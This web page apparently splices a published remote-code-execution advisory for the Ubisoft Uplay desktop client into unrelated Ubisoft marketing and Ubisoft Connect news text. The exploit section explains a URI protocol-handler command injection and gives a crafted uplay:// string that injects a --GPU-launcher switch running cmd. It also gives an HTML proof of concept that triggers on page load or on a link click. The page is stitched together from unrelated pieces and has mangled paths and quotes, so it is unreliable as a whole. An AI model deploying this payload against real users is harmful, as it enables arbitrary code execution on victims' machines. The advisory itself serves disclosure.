The Ubisoft Uplay Desktop App

# Exploit Title: Ubisoft Uplay Desktop Client 63.0.5699.0 – Remote Code Execution
# Date: 2018-09-01
# Exploit Author: Che-Chun Kuo
# Vulnerability Type: URI Parsing Command Injection
# Vendor Homepage: https://www.ubisoft.com/en-us/
# Software Link: https://uplay.ubi.com/
# Version: 63.0.5699.0
# Tested on: Windows, Microsoft Edge
# Advisory: https://forums.ubi.com/showthread.php/1912340-Uplay-PC-Client-July-17th-2018
# CVE: N/A

# Vulnerability
# The Uplay desktop client does not properly validate user-controlled data passed to its custom
# uplay URI protocol handler. This flaw can be used to exploit the Chromium Embedded Framework (CEF)
# integrated within the Uplay client, allowing for arbitrary code execution.

Log in to your Ubisoft+ account to activate your games, see rewards, and read the latest game news. Welcome to the official website for Ubisoft, creator of Assassin's Creed, Just Dance, Tom Clancy's video game series, Rayman, Far Cry, Watch Dogs and many others. Learn more about our breathtaking games here!

# Installing Uplay registers the following custom uplay protocol handler:
# HKEY_CLASSES_ROOT
# uplay
# (Default) = “URL:uplay Protocol”
# URL Protocol = “”
# DefaultIcon
# (Default) = “upc.exe”
# Shell
# Open
# Command
# (Default) = “C:Program Files (x86)UbisoftUbisoft Game Launcherupc.exe” “%1″

# The %1 will be replaced with arguments from the URI. The following crafted URI performs arbitrary code execution:

‘uplay://foobar” –GPU-launcher=”cmd /K whoami &” –‘

Jan 20, 2020 Ubisoft Uplay is one of the most popular Games alongside Call of Duty, Super Mario, and GOG Galaxy. This app has its advantages compared to other Games applications. Ubisoft Uplay is lightweight and easy to use, simple for beginners and powerful for profes. Jul 03, 2012 The Ubisoft Uplay Desktop App For Mac Free (Redirected from Uplay+) Welcome to the official website for Ubisoft, creator of Assassin's Creed, Just Dance, Tom Clancy's video game series, Rayman, Far Cry, Watch Dogs and many others.

# When a victim opens this URI, the string is passed to the Windows ShellExecute function.
# Microsoft states the following: “When ShellExecute executes the pluggable protocol handler with a
# string on the command line, any non-encoded spaces, quotes, and backslashes in the URI will
# be interpreted as part of the command line. This means that if you use C/C++’s argc and
# argv to determine the arguments passed to your application, the string may be broken
# across multiple parameters.”

# “Malicious parties could use additional quote or backslash characters to pass additional command
# line parameters. For this reason, pluggable protocol handlers should assume that any parameters on
# the command line could come from malicious parties, and carefully validate them.”

# The Uplay desktop client does not properly validate user-controlled data. An attacker can inject
# certain Chromium flags that allow for arbitrary code execution. The malicious URI breaks the
# command line with a quote character and inserts a new switch called –GPU-launcher. Since the
# Uplay client uses the Chromium Embedded Framework (CEF), Chromium command lines switches are supported.
# The –GPU-launcher switch provides a method to execute arbitrary commands. The following string shows
# the final command, which opens the Windows command prompt and executes the whoami program.

“C:Program Files (x86)UbisoftUbisoft Game Launcherupc.exe” “foobar” –GPU-launcher=”cmd /K whoami &” –”

# Attack Scenario
# The following attack scenario would result in the compromise of a victim’s machine with the vulnerable
# Uplay client installed. A user running Microsoft Edge visits a specially crafted webpage or clicks on a
# specially crafted link. The user is served with the prompt: Did you mean to switch apps? Microsoft Edge
# is trying to open “UPlay launcher”. After the user gives consent, the vulnerable application runs,
# resulting in arbitrary code execution in the context of the current process.

# This scenario also works on IE, but the IE browser shows the URI string to be opened and warns users against
# opening untrusted content. Microsoft Edge provides no such warning. Chrome and Firefox both escape
# illegal characters before passing the URI to the protocol handler.

Ubisoft Connect Install

# After Uplay desktop client (upc.exe) is run, upc.exe will attempt to open additional executables
# before the –GPU-launcher is activated. One notable executable is the UplayService.exe. UplayService
# requires elevated privileges. If the user is a non-administrative user a UAC prompt will appear.
# It should be noted, this UAC prompt doesn’t prevent command execution from occurring.
# Regardless of which option the user chooses within the UplayService UAC prompt (Yes/No),
# command execution will still occur once the code that passes the –GPU-launcher switch
# to the CEF is triggered within upc.exe.

# Proof of Concept
# The following POC provides two avenues to trigger the vulnerability within Microsoft Edge.
# The first method triggers when the webpage is opened. The second method triggers when the
# hyperlink is clicked by a user.

POC:
[su_quote]

<!doctype html>
<a href=’uplay://foobar” –GPU-launcher=”cmd /K whoami &” –‘>ubisoft uplay desktop client rce poc</a>

<script>
window.location = ‘uplay://foobar” –GPU-launcher=”cmd /K whoami &” –‘
</script>

[/su_quote]

Although gamers still set up camps divided along platform lines, there has never before been a bigger push to build bridges between these competing platforms. Cross-platform saves and cross-play have become selling points for many recent games that try to appeal to as many gamers as possible across multiple devices. Ubisoft is riding that wave with Ubisoft Connect, its new one-stop-shop for all its gaming perks and social gaming needs, including playing with others on different platforms, depending on the game, of course.

Ubisoft unsurprisingly focuses on what the new Ubisoft Connect hub combines. Previously, it had a separate Ubisoft Club rewards program and app and, of course, its Uplay desktop game launcher and store. Connect now merges those two in a single place so players won’t have to juggle two or more things.

The Ubisoft Uplay Desktop AppDesktop

Uplay Launcher Download

Ubisoft Connect will have the usual rewards system where you earn XP by playing games and finishing in-game challenges. This XP can then be exchanged for Units currency that, in turn, can be used to unlock rewards for some games. There are, of course, also social features as well as tips and video recommendations based on the games you own or play.

The Ubisoft Uplay Desktop App Downloads

What will perhaps be more interesting for some gamers are the cross-platform perks, which include cross-progression or the ability to carry save data across supported platforms. Cross-play also opens wide the doors for multiplayer games that are available on PlayStation, Xbox, and PCs so that players can team up or compete with others, no matter what device they’re playing on.

Desktop

The Ubisoft Uplay Desktop App Store

The latter features don’t automatically get added to all Ubisoft games, of course, there are is currently a very short list of titles that support it, including Assassin’s Creed Valhalla, Immortals Fenyx Rising, Riders Republic, and the upcoming Watch Dogs: Legion. Ubisoft Connect launches on November 10 for PC, Xbox One, Xbox Series X|S, PlayStation 4, and Nintendo Switch while the PlayStation 5 will have to wait until November 15. Connect will also arrive on Google Stadia, NVIDIA GeForce NOW, and Amazon Luna game streaming services later this year.